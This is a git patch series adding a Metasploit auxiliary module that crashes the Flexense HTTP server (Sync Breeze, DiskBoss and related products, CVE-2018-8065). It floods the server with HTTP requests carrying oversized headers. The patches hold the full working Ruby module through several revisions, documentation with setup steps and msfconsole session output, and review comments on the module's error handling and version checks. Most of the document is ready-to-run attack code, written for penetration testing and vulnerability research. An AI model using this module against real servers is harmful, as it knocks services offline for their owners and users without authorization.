From 0e4e260a0276306fd2117e7328302acabb8fa06c Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Ege=20Balc=C4=B1?= Date: Sun, 11 Mar 2018 23:07:50 +0300 Subject: [PATCH 1/9] Adding Sync Breeze Enterprise 10.6.24 DOS This module triggers a Denial of Service vulnerability in the Sync Breeze Enterprise HTTP server. Vulnerable version of the product can be downloaded here (http://www.syncbreeze.com/setups/syncbreezeent_setup_v10.6.24.exe). After installing the software web server should be enabled via Options->Server->Enable web server on port. Module triggers a user space write access violation on syncbrs.exe memory region. Number of requests that will crash the server changes between 200-1000 depending on the OS version and system memory. --- .../dos/http/syncbreeze_enterprise_dos.rb | 86 +++++++++++++++++++ 1 file changed, 86 insertions(+) create mode 100644 modules/auxiliary/dos/http/syncbreeze_enterprise_dos.rb diff --git a/modules/auxiliary/dos/http/syncbreeze_enterprise_dos.rb b/modules/auxiliary/dos/http/syncbreeze_enterprise_dos.rb new file mode 100644 index 0000000000..dd92f73490 --- /dev/null +++ b/modules/auxiliary/dos/http/syncbreeze_enterprise_dos.rb 
@@ -0,0 +1,86 @@ +## +# This module requires Metasploit: https://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +class MetasploitModule < Msf::Auxiliary + include Msf::Exploit::Remote::Tcp + include Msf::Auxiliary::Dos + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'Sync Breeze Enterprise 10.6.24 Denial Of Service', + 'Description' => %q{ + This module triggers a Denial of Service vulnerability in the Sync Breeze Enterprise HTTP server. + Vulnerability caused by a user mode write access memory violation and can be triggered with rapidly sending variety of HTTP requests with long HTTP header values. + Sync Breeze Enterprise 10.6.24 version reportedly vulnerable. + }, + 'Author' => [ 'Ege Balci ' ], + 'License' => MSF_LICENSE, + 'References' => + [ + [ 'URL', 'https://github.com/EgeBalci/Sync_Breeze_Enterprise_10_6_24_-DOS' ], + ], + 'DisclosureDate' => 'Mar 09 2018')) + + register_options( + [ + Opt::RPORT(80), + ]) + + end + + def run + + print_status("Sending HTTP DoS packets...") + trig = true + + begin + connect + disconnect + rescue + print_error("Unable to connect to #{rhost}:#{rport}") + trig = false + end + + while trig do + payload = "" + rnd = rand(4) + if rnd == 0 then + payload << "PUT /index.html HTTP/1.1\n" + payload << "Host: localhost\n" + payload << "User-Agent: Mozilla\n" + payload << "Accept: */*"+("A"*rand(8000))+"\r\n\r\n" + elsif rnd == 1 then + payload << "POST /"+("A"*rand(8000))+" HTTP/0.9\n" + payload << "Host: localhost\n" + payload << "User-Agent: Mozilla\n" + payload << "Accept: */*\r\n\r\n" + elsif rnd == 2 then + payload << "POST /index.html HTTP/0.9\n" + payload << "Host: localhost\n" + payload << "User-Agent: Mozilla"+("A"*rand(8000))+"\n" + payload << "Accept: */*\r\n\r\n" + elsif rnd == 3 then + payload << "GET /index.html HTTP/0.9\n" + payload << "Host: localhost\n" + payload << "User-Agent: Mozilla\n" + payload << "Accept: */*"+("A"*rand(8000))+"\r\n\r\n" + end 
+ + print_status("Request size: (#{payload.size}) byte") + begin + connect + sock.put(payload) + disconnect + rescue ::Rex::HostUnreachable, ::Rex::ConnectionTimeout + print_error("Unable to connect to #{rhost}:#{rport}") + break + rescue ::Errno::ECONNRESET,::Rex::ConnectionRefused + print_good("DoS successful #{rhost} is down !") + break + end + end + + end +end From d71b6bdf0d19afb0646f9075051f206466272ebe Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Ege=20Balc=C4=B1?= Date: Sun, 11 Mar 2018 23:27:46 +0300 Subject: [PATCH 2/9] Update syncbreeze_enterprise_dos.rb msftidy.rb adjustment. --- modules/auxiliary/dos/http/syncbreeze_enterprise_dos.rb | 4 +--- 1 file changed, 1 insertion(+), 3 deletions(-) diff --git a/modules/auxiliary/dos/http/syncbreeze_enterprise_dos.rb b/modules/auxiliary/dos/http/syncbreeze_enterprise_dos.rb index dd92f73490..98b503aaf1 100644 --- a/modules/auxiliary/dos/http/syncbreeze_enterprise_dos.rb +++ b/modules/auxiliary/dos/http/syncbreeze_enterprise_dos.rb @@ -31,14 +31,13 @@ class MetasploitModule < Msf::Auxiliary end def run - print_status("Sending HTTP DoS packets...") trig = true begin connect disconnect - rescue + rescue print_error("Unable to connect to #{rhost}:#{rport}") trig = false end @@ -81,6 +80,5 @@ class MetasploitModule < Msf::Auxiliary break end end - end end From 420905137b464b270438e3261bda8c92bec23a7a Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Ege=20Balc=C4=B1?= Date: Mon, 12 Mar 2018 08:42:28 +0300 Subject: [PATCH 3/9] CVA added. --- modules/auxiliary/dos/http/syncbreeze_enterprise_dos.rb | 1 + 1 file changed, 1 insertion(+) diff --git a/modules/auxiliary/dos/http/syncbreeze_enterprise_dos.rb b/modules/auxiliary/dos/http/syncbreeze_enterprise_dos.rb index 98b503aaf1..9a0738840c 100644 --- a/modules/auxiliary/dos/http/syncbreeze_enterprise_dos.rb +++ b/modules/auxiliary/dos/http/syncbreeze_enterprise_dos.rb 
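Review bot: In `run`, `rescue ::Errno::ECONNRESET,::Rex::ConnectionRefused` prints `DoS successful` and breaks on the first reset, but a reset on one oversized request only shows that this connection was dropped; the listener being gone (a refused connection) is the signal that the service is down. I would log a reset and keep looping — `rescue ::Errno::ECONNRESET` / `print_error('Connection reset, continuing')` — and leave `print_good`/`break` under `rescue ::Rex::ConnectionRefused` alone. The connectivity probe above the loop uses a bare `rescue`, which turns any StandardError, including a bug in the module itself, into 'Unable to connect'; `rescue ::Rex::ConnectionError` is the narrow form matching the Rex exceptions caught inside the loop. The header lines end in `\n` while the request ends in `\r\n\r\n`; if the bare-LF header lines are deliberate for triggering the crash, a one-line comment saying so would stop the next reader from "fixing" them.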
@@ -19,6 +19,7 @@ class MetasploitModule < Msf::Auxiliary 'License' => MSF_LICENSE, 'References' => [ + ['CVE', '2018-8065'], [ 'URL', 'https://github.com/EgeBalci/Sync_Breeze_Enterprise_10_6_24_-DOS' ], ], 'DisclosureDate' => 'Mar 09 2018')) From b7b09c5010229bc2bf83d98eb420b6a82dc6dd02 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Ege=20Balc=C4=B1?= Date: Mon, 12 Mar 2018 20:30:15 +0300 Subject: [PATCH 4/9] Documentation added. --- .../dos/http/syncbreeze_enterprise_do.md | 63 +++++++++++++++++++ 1 file changed, 63 insertions(+) create mode 100644 documentation/modules/auxiliary/dos/http/syncbreeze_enterprise_do.md diff --git a/documentation/modules/auxiliary/dos/http/syncbreeze_enterprise_do.md b/documentation/modules/auxiliary/dos/http/syncbreeze_enterprise_do.md new file mode 100644 index 0000000000..6fd2de82b9 --- /dev/null +++ b/documentation/modules/auxiliary/dos/http/syncbreeze_enterprise_do.md 
@@ -0,0 +1,63 @@ +## Description +This module triggers a Denial of Service vulnerability in the Sync Breeze Enterprise HTTP server. It is possible to trigger +a write access memory vialation via rapidly sending HTTP requests with large HTTP header values. + + +## Vulnerable Application +According To publicly exploit Disclosure of Sync Breeze Enterprise v10.6.24 +this software is vulnerable to Denial Of Service. +read more : http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8065 + +**Vulnerable Application Link** +http://www.syncbreeze.com/setups/syncbreezeent_setup_v10.6.24.exe + +## Vulnerable Application Installation Setup. +Download Application : ```http://www.syncbreeze.com/setups/syncbreezeent_setup_v10.6.24.exe``` + +**And Follow Sync Breeze Enterprise v10.6.24 Setup Wizard** + +After the installation navigate to: ```Options->Server``` + +Check the box saying: ```Enable web server on port:...``` + +## Verification Steps + + 1. Install the application + 2. Start msfconsole + 3. Do: `use auxiliary/dos/http/syncbreeze_enterprise_dos` + 4. Do: `set rport ` + 5. Do: `set rhost ` + 6. Do: `check` +``` +[*] 192.168.1.27:80 - Checking connection to 192.168.1.27:80 +[+] 192.168.1.27:80 - Sync Breeze Enterprise v10.6.24 verified. +[+] 192.168.1.27:80 The target is vulnerable. +``` + 7. Do: `run` + 8. Web server will crash after 200-1000 request depending on the OS version and system memory. + +## Scenarios +**TESTED AGAINST WINDOWS 7/10** +``` +msf5 > use auxiliary/dos/http/syncbreeze_enterprise_dos +msf5 auxiliary(dos/http/syncbreeze_enterprise_dos) > set rhost 192.168.1.27 +rhost => 192.168.1.27 +msf5 auxiliary(dos/http/syncbreeze_enterprise_dos) > set rport 80 +rport => 80 +msf5 auxiliary(dos/http/syncbreeze_enterprise_dos) > run + +[*] 192.168.1.27:80 - Checking connection to 192.168.1.27:80 +[+] 192.168.1.27:80 - Sync Breeze Enterprise v10.6.24 verified. +[*] 192.168.1.27:80 - Sending HTTP DoS packets... 
+[*] 192.168.1.27:80 - Request size: (6667) byte +[*] 192.168.1.27:80 - Request size: (13990) byte +[*] 192.168.1.27:80 - Request size: (15797) byte +[*] 192.168.1.27:80 - Request size: (20369) byte +[*] 192.168.1.27:80 - Request size: (11119) byte +[*] 192.168.1.27:80 - Request size: (16293) byte +[*] 192.168.1.27:80 - Request size: (13830) byte +... +[+] 192.168.1.27:80 - DoS successful 192.168.1.27 is down ! +[*] Auxiliary module execution completed + +``` From 2950c84660acd6c3a38d5cdd8773e4330e502ffc Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Ege=20Balc=C4=B1?= Date: Mon, 12 Mar 2018 20:33:46 +0300 Subject: [PATCH 5/9] Better code. Added check function. Smaller & cleaner code. --- .../dos/http/syncbreeze_enterprise_dos.rb | 82 ++++++++----------- 1 file changed, 36 insertions(+), 46 deletions(-) diff --git a/modules/auxiliary/dos/http/syncbreeze_enterprise_dos.rb b/modules/auxiliary/dos/http/syncbreeze_enterprise_dos.rb index 9a0738840c..d0ae26e18c 100644 --- a/modules/auxiliary/dos/http/syncbreeze_enterprise_dos.rb +++ b/modules/auxiliary/dos/http/syncbreeze_enterprise_dos.rb @@ -4,8 +4,8 @@ ## class MetasploitModule < Msf::Auxiliary - include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Dos + include Msf::Exploit::Remote::Tcp def initialize(info = {}) super(update_info(info, @@ -19,7 +19,7 @@ class MetasploitModule < Msf::Auxiliary 'License' => MSF_LICENSE, 'References' => [ - ['CVE', '2018-8065'], + [ 'CVE', '2018-8065'], [ 'URL', 'https://github.com/EgeBalci/Sync_Breeze_Enterprise_10_6_24_-DOS' ], ], 'DisclosureDate' => 'Mar 09 2018')) 
@@ -31,55 +31,45 @@ class MetasploitModule < Msf::Auxiliary end - def run - print_status("Sending HTTP DoS packets...") - trig = true - + def check begin connect - disconnect + sock.put("GET / HTTP/1.0\r\n\r\n") + res = sock.get + if res and res.include? 'Flexense HTTP Server v10.6.24' + Exploit::CheckCode::Vulnerable + else + Exploit::CheckCode::Safe + end rescue - print_error("Unable to connect to #{rhost}:#{rport}") - trig = false + Exploit::CheckCode::Safe + end + end + + def run + unless check == Exploit::CheckCode::Vulnerable + fail_with(Failure::NotVulnerable, 'Target is not vulnerable.') end - while trig do - payload = "" - rnd = rand(4) - if rnd == 0 then - payload << "PUT /index.html HTTP/1.1\n" - payload << "Host: localhost\n" - payload << "User-Agent: Mozilla\n" - payload << "Accept: */*"+("A"*rand(8000))+"\r\n\r\n" - elsif rnd == 1 then - payload << "POST /"+("A"*rand(8000))+" HTTP/0.9\n" - payload << "Host: localhost\n" - payload << "User-Agent: Mozilla\n" - payload << "Accept: */*\r\n\r\n" - elsif rnd == 2 then - payload << "POST /index.html HTTP/0.9\n" - payload << "Host: localhost\n" - payload << "User-Agent: Mozilla"+("A"*rand(8000))+"\n" - payload << "Accept: */*\r\n\r\n" - elsif rnd == 3 then - payload << "GET /index.html HTTP/0.9\n" - payload << "Host: localhost\n" - payload << "User-Agent: Mozilla\n" - payload << "Accept: */*"+("A"*rand(8000))+"\r\n\r\n" - end - - print_status("Request size: (#{payload.size}) byte") - begin - connect - sock.put(payload) - disconnect - rescue ::Rex::HostUnreachable, ::Rex::ConnectionTimeout - print_error("Unable to connect to #{rhost}:#{rport}") - break - rescue ::Errno::ECONNRESET,::Rex::ConnectionRefused - print_good("DoS successful #{rhost} is down !") - break - end + print_status('Triggering the vulnerability') + loop do + payload = "" + payload << "GET /"+('A'*rand(8000))+" HTTP/0.9\n" + payload << "Host: 127.0.0.1\n" + payload << "User-Agent: Mozilla"+('A'*rand(8000))+"\n" + payload << "Accept: 
"+('A'*rand(8000))+"\r\n\r\n" + begin + connect + sock.put(payload) + disconnect + rescue ::Rex::ConnectionTimeout + print_error('Connection timeout !') + rescue ::Errno::ECONNRESET + print_error('Connection reset !') + rescue ::Rex::ConnectionRefused + print_good("DoS successful #{rhost} is down !") + break + end end end end From 177eca30e8c08dd2abe45f79409ec731ab87a19b Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Ege=20Balc=C4=B1?= Date: Thu, 15 Mar 2018 12:39:22 +0300 Subject: [PATCH 6/9] Usage instructions adjusted. --- .../dos/http/syncbreeze_enterprise_do.md | 19 ++++--------------- 1 file changed, 4 insertions(+), 15 deletions(-) diff --git a/documentation/modules/auxiliary/dos/http/syncbreeze_enterprise_do.md b/documentation/modules/auxiliary/dos/http/syncbreeze_enterprise_do.md index 6fd2de82b9..643dc5ec80 100644 --- a/documentation/modules/auxiliary/dos/http/syncbreeze_enterprise_do.md +++ b/documentation/modules/auxiliary/dos/http/syncbreeze_enterprise_do.md @@ -29,9 +29,7 @@ Check the box saying: ```Enable web server on port:...``` 5. Do: `set rhost ` 6. Do: `check` ``` -[*] 192.168.1.27:80 - Checking connection to 192.168.1.27:80 -[+] 192.168.1.27:80 - Sync Breeze Enterprise v10.6.24 verified. -[+] 192.168.1.27:80 The target is vulnerable. +[+] 192.168.1.20:80 The target is vulnerable. ``` 7. Do: `run` 8. Web server will crash after 200-1000 request depending on the OS version and system memory. 
@@ -46,18 +44,9 @@ msf5 auxiliary(dos/http/syncbreeze_enterprise_dos) > set rport 80 rport => 80 msf5 auxiliary(dos/http/syncbreeze_enterprise_dos) > run -[*] 192.168.1.27:80 - Checking connection to 192.168.1.27:80 -[+] 192.168.1.27:80 - Sync Breeze Enterprise v10.6.24 verified. -[*] 192.168.1.27:80 - Sending HTTP DoS packets... -[*] 192.168.1.27:80 - Request size: (6667) byte -[*] 192.168.1.27:80 - Request size: (13990) byte -[*] 192.168.1.27:80 - Request size: (15797) byte -[*] 192.168.1.27:80 - Request size: (20369) byte -[*] 192.168.1.27:80 - Request size: (11119) byte -[*] 192.168.1.27:80 - Request size: (16293) byte -[*] 192.168.1.27:80 - Request size: (13830) byte -... -[+] 192.168.1.27:80 - DoS successful 192.168.1.27 is down ! +[*] 192.168.1.20:80 - Triggering the vulnerability +[-] 192.168.1.20:80 - Connection reset ! +[+] 192.168.1.20:80 - DoS successful 192.168.1.20 is down ! [*] Auxiliary module execution completed ``` From e52b065b2600ae64a3bdd170420a6c04b02b0e62 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Ege=20Balc=C4=B1?= Date: Fri, 25 May 2018 20:18:54 +0300 Subject: [PATCH 7/9] Manual rewritten for flexense_http_server_dos --- .../dos/http/flexense_http_server_dos.md | 67 +++++++++++++++++++ .../dos/http/syncbreeze_enterprise_do.md | 52 -------------- 2 files changed, 67 insertions(+), 52 deletions(-) create mode 100644 documentation/modules/auxiliary/dos/http/flexense_http_server_dos.md delete mode 100644 documentation/modules/auxiliary/dos/http/syncbreeze_enterprise_do.md diff --git a/documentation/modules/auxiliary/dos/http/flexense_http_server_dos.md b/documentation/modules/auxiliary/dos/http/flexense_http_server_dos.md new file mode 100644 index 0000000000..d930453a26 --- /dev/null +++ b/documentation/modules/auxiliary/dos/http/flexense_http_server_dos.md 
@@ -0,0 +1,67 @@ +## Description +This module triggers a Denial of Service vulnerability in the Flexense Enterprise HTTP server. It is possible to trigger +a write access memory vialation via rapidly sending HTTP requests with large HTTP header values. + + +## Vulnerable Application +According To publicly exploit Disclosure of Flexense HTTP Server v10.6.24 +Following list of softwares are vulnerable to Denial Of Service. +read more : http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8065 + + +DiskBoss Enterprise <= v9.0.18 +Sync Breeze Enterprise <= v10.6.24 +Disk Pulse Enterprise <= v10.6.24 +Disk Savvy Enterprise <= v10.6.24 +Dup Scout Enterprise <= v10.6.24 +VX Search Enterprise <= v10.6.24 + + +**Vulnerable Application Link** +http://www.diskboss.com/downloads.html +http://www.syncbreeze.com/downloads.html +http://www.diskpulse.com/downloads.html +http://www.disksavvy.com/downloads.html +http://www.dupscout.com/downloads.html + + +## Vulnerable Application Installation Setup. +All Flexense applications that are listed above can be installed by following these steps. + +Download Application : ```https://github.com/EgeBalci/Sync_Breeze_Enterprise_10_6_24_-DOS/raw/master/syncbreezeent_setup_v10.6.24.exe``` + +**And Follow Sync Breeze Enterprise v10.6.24 Setup Wizard** + +After the installation navigate to: ```Options->Server``` + +Check the box saying: ```Enable web server on port:...``` + +## Verification Steps + + 1. Install the application + 2. Start msfconsole + 3. Do: `use auxiliary/dos/http/flexense_http_server_dos` + 4. Do: `set rport ` + 5. Do: `set rhost ` + 6. Do: `check` +``` +[+] 192.168.1.20:80 The target is vulnerable. +``` + 7. Do: `run` + 8. Web server will crash after 200-1000 request depending on the OS version and system memory. 
+ +## Scenarios +**TESTED AGAINST WINDOWS 7/10** +``` +msf5 > use auxiliary/dos/http/flexense_http_server_dos +msf5 auxiliary(dos/http/flexense_http_server_dos) > set rhost 192.168.1.27 +rhost => 192.168.1.27 +msf5 auxiliary(dos/http/flexense_http_server_dos) > set rport 80 +rport => 80 +msf5 auxiliary(dos/http/flexense_http_server_dos) > run + +[*] 192.168.1.20:80 - Triggering the vulnerability +[+] 192.168.1.20:80 - DoS successful 192.168.1.20 is down ! +[*] Auxiliary module execution completed + +``` diff --git a/documentation/modules/auxiliary/dos/http/syncbreeze_enterprise_do.md b/documentation/modules/auxiliary/dos/http/syncbreeze_enterprise_do.md deleted file mode 100644 index 643dc5ec80..0000000000 --- a/documentation/modules/auxiliary/dos/http/syncbreeze_enterprise_do.md +++ /dev/null 
@@ -1,52 +0,0 @@ -## Description -This module triggers a Denial of Service vulnerability in the Sync Breeze Enterprise HTTP server. It is possible to trigger -a write access memory vialation via rapidly sending HTTP requests with large HTTP header values. - - -## Vulnerable Application -According To publicly exploit Disclosure of Sync Breeze Enterprise v10.6.24 -this software is vulnerable to Denial Of Service. -read more : http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8065 - -**Vulnerable Application Link** -http://www.syncbreeze.com/setups/syncbreezeent_setup_v10.6.24.exe - -## Vulnerable Application Installation Setup. -Download Application : ```http://www.syncbreeze.com/setups/syncbreezeent_setup_v10.6.24.exe``` - -**And Follow Sync Breeze Enterprise v10.6.24 Setup Wizard** - -After the installation navigate to: ```Options->Server``` - -Check the box saying: ```Enable web server on port:...``` - -## Verification Steps - - 1. Install the application - 2. Start msfconsole - 3. Do: `use auxiliary/dos/http/syncbreeze_enterprise_dos` - 4. Do: `set rport ` - 5. Do: `set rhost ` - 6. Do: `check` -``` -[+] 192.168.1.20:80 The target is vulnerable. -``` - 7. Do: `run` - 8. Web server will crash after 200-1000 request depending on the OS version and system memory. - -## Scenarios -**TESTED AGAINST WINDOWS 7/10** -``` -msf5 > use auxiliary/dos/http/syncbreeze_enterprise_dos -msf5 auxiliary(dos/http/syncbreeze_enterprise_dos) > set rhost 192.168.1.27 -rhost => 192.168.1.27 -msf5 auxiliary(dos/http/syncbreeze_enterprise_dos) > set rport 80 -rport => 80 -msf5 auxiliary(dos/http/syncbreeze_enterprise_dos) > run - -[*] 192.168.1.20:80 - Triggering the vulnerability -[-] 192.168.1.20:80 - Connection reset ! -[+] 192.168.1.20:80 - DoS successful 192.168.1.20 is down ! -[*] Auxiliary module execution completed - -``` From 3ab75267866ea9a46257277e757cda3a6436a935 Mon Sep 17 00:00:00 2001 
From: =?UTF-8?q?Ege=20Balc=C4=B1?= Date: Fri, 25 May 2018 20:22:51 +0300 Subject: [PATCH 8/9] Name & description Change Exploit::CheckCode changed to Unknown as suggested. --- ...e_enterprise_dos.rb => flexense_http_server_dos.rb} | 10 +++++----- 1 file changed, 5 insertions(+), 5 deletions(-) rename modules/auxiliary/dos/http/{syncbreeze_enterprise_dos.rb => flexense_http_server_dos.rb} (87%) diff --git a/modules/auxiliary/dos/http/syncbreeze_enterprise_dos.rb b/modules/auxiliary/dos/http/flexense_http_server_dos.rb similarity index 87% rename from modules/auxiliary/dos/http/syncbreeze_enterprise_dos.rb rename to modules/auxiliary/dos/http/flexense_http_server_dos.rb index d0ae26e18c..f045bd694e 100644 --- a/modules/auxiliary/dos/http/syncbreeze_enterprise_dos.rb +++ b/modules/auxiliary/dos/http/flexense_http_server_dos.rb @@ -9,11 +9,11 @@ class MetasploitModule < Msf::Auxiliary def initialize(info = {}) super(update_info(info, - 'Name' => 'Sync Breeze Enterprise 10.6.24 Denial Of Service', + 'Name' => 'Flexense HTTP Server Denial Of Service', 'Description' => %q{ - This module triggers a Denial of Service vulnerability in the Sync Breeze Enterprise HTTP server. + This module triggers a Denial of Service vulnerability in the Flexense HTTP server. Vulnerability caused by a user mode write access memory violation and can be triggered with rapidly sending variety of HTTP requests with long HTTP header values. - Sync Breeze Enterprise 10.6.24 version reportedly vulnerable. + Multiple Flexense applications that are using Flexense HTTP server 10.6.24 and below vesions reportedly vulnerable. }, 'Author' => [ 'Ege Balci ' ], 'License' => MSF_LICENSE, @@ -39,10 +39,10 @@ class MetasploitModule < Msf::Auxiliary if res and res.include? 'Flexense HTTP Server v10.6.24' Exploit::CheckCode::Vulnerable else - Exploit::CheckCode::Safe + Exploit::CheckCode::Unknown end rescue - Exploit::CheckCode::Safe + Exploit::CheckCode::Unknown end end 
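Review bot: The new description says Flexense HTTP server "10.6.24 and below" versions are vulnerable, but `check` (second hunk) still matches only the literal banner `Flexense HTTP Server v10.6.24`, so every older build now gets `CheckCode::Unknown` and `run` refuses it with NotVulnerable. Parsing the version out of the banner and comparing it numerically would make the check agree with the description; whether each product's own version number (e.g. the DiskBoss 9.0.18 cutoff listed in the docs) maps onto the same HTTP server version string is not visible here and should be confirmed before widening the match. Returning `Unknown` when a banner was read but did not match also discards the fact that the host runs a Flexense server at all — `CheckCode::Detected` is the conventional value for that case. `vesions` in the description is a typo.
```ruby
# … unchanged: connect, GET / request, res = sock.get …
m = res && res.match(/Flexense HTTP Server v(\d+)\.(\d+)\.(\d+)/)
return Exploit::CheckCode::Unknown unless m
# Banner version at or below 10.6.24 is reported vulnerable; a newer build is only "detected".
if (m.captures.map(&:to_i) <=> [10, 6, 24]) <= 0
  Exploit::CheckCode::Vulnerable
else
  Exploit::CheckCode::Detected
end
```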
From 026b22d061ccd6194bef22c92debb968cc6a2d1d Mon Sep 17 00:00:00 2001 From: Aaron Soto Date: Tue, 29 May 2018 16:09:27 -0500 Subject: [PATCH 9/9] Refined packet sizes and counts, improved error messages --- .../dos/http/flexense_http_server_dos.rb | 42 +++++++++++++------ 1 file changed, 29 insertions(+), 13 deletions(-) diff --git a/modules/auxiliary/dos/http/flexense_http_server_dos.rb b/modules/auxiliary/dos/http/flexense_http_server_dos.rb index f045bd694e..dd77806d27 100644 --- a/modules/auxiliary/dos/http/flexense_http_server_dos.rb +++ b/modules/auxiliary/dos/http/flexense_http_server_dos.rb @@ -12,7 +12,9 @@ class MetasploitModule < Msf::Auxiliary 'Name' => 'Flexense HTTP Server Denial Of Service', 'Description' => %q{ This module triggers a Denial of Service vulnerability in the Flexense HTTP server. - Vulnerability caused by a user mode write access memory violation and can be triggered with rapidly sending variety of HTTP requests with long HTTP header values. + Vulnerability caused by a user mode write access memory violation and can be triggered with + rapidly sending variety of HTTP requests with long HTTP header values. + Multiple Flexense applications that are using Flexense HTTP server 10.6.24 and below vesions reportedly vulnerable. }, 'Author' => [ 'Ege Balci ' ], @@ -27,6 +29,8 @@ class MetasploitModule < Msf::Auxiliary register_options( [ Opt::RPORT(80), + OptString.new('PacketCount', [ true, "The number of packets to be sent (Recommended: Above 1725)" , 1725 ]), + OptString.new('PacketSize', [ true, "The number of bytes in the Accept header (Recommended: 4088-5090" , rand(4088..5090) ]) ]) end 
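Review bot: `PacketCount` and `PacketSize` are registered as `OptString` although both are consumed as integers (`datastore['PacketSize'].to_i` and the `count` comparison in `run`); `OptInt` validates what the user types and hands `run` an Integer, e.g. `OptInt.new('PacketCount', [true, 'The number of packets to be sent (Recommended: Above 1725)', 1725])`. The `rand(4088..5090)` default is drawn once when the module class is loaded, so every run in the same msfconsole session uses the same size unless the user overrides it; if per-run variation is intended, pick the value inside `run` instead. The PacketSize description string is missing its closing parenthesis.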
@@ -37,39 +41,51 @@ class MetasploitModule < Msf::Auxiliary sock.put("GET / HTTP/1.0\r\n\r\n") res = sock.get if res and res.include? 'Flexense HTTP Server v10.6.24' - Exploit::CheckCode::Vulnerable + Exploit::CheckCode::Appears else - Exploit::CheckCode::Unknown + Exploit::CheckCode::Safe end + rescue Rex::ConnectionRefused + print_error("Target refused the connection") + Exploit::CheckCode::Unknown rescue + print_error("Target did not respond to HTTP request") Exploit::CheckCode::Unknown end end def run - unless check == Exploit::CheckCode::Vulnerable + unless check == Exploit::CheckCode::Appears fail_with(Failure::NotVulnerable, 'Target is not vulnerable.') end - print_status('Triggering the vulnerability') + size = datastore['PacketSize'].to_i + print_status("Starting with packets of #{size}-byte strings") + + count = 0 loop do payload = "" - payload << "GET /"+('A'*rand(8000))+" HTTP/0.9\n" - payload << "Host: 127.0.0.1\n" - payload << "User-Agent: Mozilla"+('A'*rand(8000))+"\n" - payload << "Accept: "+('A'*rand(8000))+"\r\n\r\n" + payload << "GET /" + Rex::Text.rand_text_alpha(rand(30)) + " HTTP/1.1\r\n" + payload << "Host: 127.0.0.1\r\n" + payload << "Accept: "+('A' * size)+"\r\n" + payload << "\r\n\r\n" begin connect sock.put(payload) disconnect + count += 1 + break if count==datastore['PacketCount'] + rescue ::Rex::InvalidDestination + print_error('Invalid destination! Continuing...') rescue ::Rex::ConnectionTimeout - print_error('Connection timeout !') + print_error('Connection timeout! Continuing...') rescue ::Errno::ECONNRESET - print_error('Connection reset !') + print_error('Connection reset! Continuing...') rescue ::Rex::ConnectionRefused - print_good("DoS successful #{rhost} is down !") - break + print_good("DoS successful after #{count} packets with #{size}-byte headers") + return true end end + print_error("DoS failed after #{count} packets of #{size}-byte strings") end end
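Review bot: `break if count==datastore['PacketCount']` compares an Integer with whatever the datastore holds, and that is a String whenever the option is set from the console (it is declared `OptString`), so the comparison never matches, the count limit is silently ignored and the loop ends only on `ConnectionRefused`; coerce as `size` already does, `break if count >= datastore['PacketCount'].to_i`. `count` is also incremented only after a successful `sock.put`, so a target that resets or times out on every connection (the `Continuing...` branches) is retried forever and never reaches the bound — count attempts instead by moving `count += 1` to the top of the loop body. `check` now returns `Safe` for any banner other than the exact 10.6.24 string, so the "and below" versions named in the description are refused by `fail_with`; that mismatch predates this commit but should be settled before merge. `check` still never calls `disconnect` on the banner socket.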